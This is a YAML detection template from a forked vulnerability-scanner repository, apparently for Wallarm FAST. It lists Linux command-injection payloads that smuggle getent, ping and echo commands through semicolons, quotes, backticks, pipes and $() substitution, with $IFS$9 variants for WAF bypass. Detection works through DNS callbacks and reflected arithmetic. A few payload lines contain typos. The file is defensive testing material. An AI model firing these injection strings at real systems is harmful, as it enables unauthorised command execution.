forked from wallarm/fast-detects
-
Notifications
You must be signed in to change notification settings - Fork 0
/
command-injection-linux.yaml
81 lines (75 loc) · 2.71 KB
/
command-injection-linux.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
generate:
- payload:
#For QUICK scan profile. DNS_MARKER & CALC_MARKER.
- ";getent hosts DNS_MARKER;echo $((CALC_MARKER));"
- ";getent$IFS$9hosts$IFS$9DNS_MARKER;echo$IFS$9$((CALC_MARKER));"
- "';getent hosts DNS_MARKER;echo $((CALC_MARKER));'"
- "';getent$IFS$9hosts$IFS$9DNS_MARKER;echo$IFS$9$((CALC_MARKER));'"
- "\";geten host DNS_MARKER;echo $((CALC_MARKER));\""
- "\";getent$IFS$9hosts$IFS$9DNS_MARKER;echo$IFS$9$((CALC_MARKER));\""
- "`getent hosts DNS_MARKER;echo $((CALC_MARKER))`"
- "`getent$IFS$9hosts$IFS$9DNS_MARKER;echo$IFS$9$((CALC_MARKER))`"
- "|getent hosts DNS_MARKER;echo $((CALC_MARKER))"
- "|getent$IFS$9hosts$IFS$9DNS_MARKER;echo$IFS$9$((CALC_MARKER))"
- "x\ngentent hosts DNS_MARKER;echo $((CALC_MARKER))\nx"
- "x\ngentent$IFS$9hosts$IFS$9DNS_MARKER;echo$IFS$9$((CALC_MARKER))\nx"
- "$(getent hosts DNS_MARKER;ping -c1 DNS_MARKER)"
- "$(getent$IFS$9hosts$IFS$9DNS_MARKER)"
#For INTENSIVE scan profile. May be useful for the limited size of the parameter or WAF bypass.
#CALC_MARKER
#- ";echo $((CALC_MARKER));"
#- ";echo$IFS$9$((CALC_MARKER));"
#- "';echo $((CALC_MARKER));'"
#- "';echo$IFS$9$((CALC_MARKER));'"
#- "\";echo $((CALC_MARKER));\""
#- "\";echo$IFS$9$((CALC_MARKER));\""
#- "`echo $((CALC_MARKER))`"
#- "`echo$IFS$9$((CALC_MARKER))`"
#- "|echo $((CALC_MARKER))"
#- "|echo$IFS$9$((CALC_MARKER))"
#- "x\necho$IFS$9$((CALC_MARKER))\nx"
#getent hosts DNS_MARKER
#- ";getent hosts DNS_MARKER;"
#- ";getent$IFS$9hosts$IFS$9DNS_MARKER;"
#- "';getent hosts DNS_MARKER;'"
#- "';getent$IFS$9hosts$IFS$9DNS_MARKER;'"
#- "\";getent hosts DNS_MARKER;\""
#- "\";getent$IFS$9hosts$IFS$9DNS_MARKER;\""
#- "`getent hosts DNS_MARKER`"
#- "`getent$IFS$9hosts$IFS$9DNS_MARKER`"
#- "|getent hosts DNS_MARKER"
#- "|getent$IFS$9hosts$IFS$9DNS_MARKER"
#- "x\ngentent$IFS$9hosts$IFS$9DNS_MARKER\nx"
#- "$(getent$IFS$9hosts$IFS$9DNS_MARKER)"
#ping DNS_MARKER
#- ";ping -c1 DNS_MARKER;"
#- ";ping$IFS$9-c1$IFS$9DNS_MARKER;"
#- "';ping -c1 DNS_MARKER;'"
#- "';ping$IFS$9-c1$IFS$9DNS_MARKER;'"
#- "\";ping -c1 DNS_MARKER;\""
#- "\";ping$IFS$9-c1$IFS$9DNS_MARKER;\""
#- "`ping -c1 DNS_MARKER`"
#- "`ping$IFS$9-c1$IFS$9DNS_MARKER`"
#- "|ping -c1 DNS_MARKER"
#- "|ping$IFS$9-c1$IFS$9DNS_MARKER"
#- "x\nping$IFS$9-c1$IFS$9DNS_MARKER\nx"
#- "$(ping$IFS$9-c1$IFS$9DNS_MARKER)"
- method:
- postfix
- replace
detect:
- oob:
- dns
- response:
- body: CALC_MARKER
meta-info:
- type: rce
- threat: 95
- tags:
- OS Commanding
- RCE
- Remote Code Execution
- Shell injection
- Command injection
- OWASP Top 10
- OWASP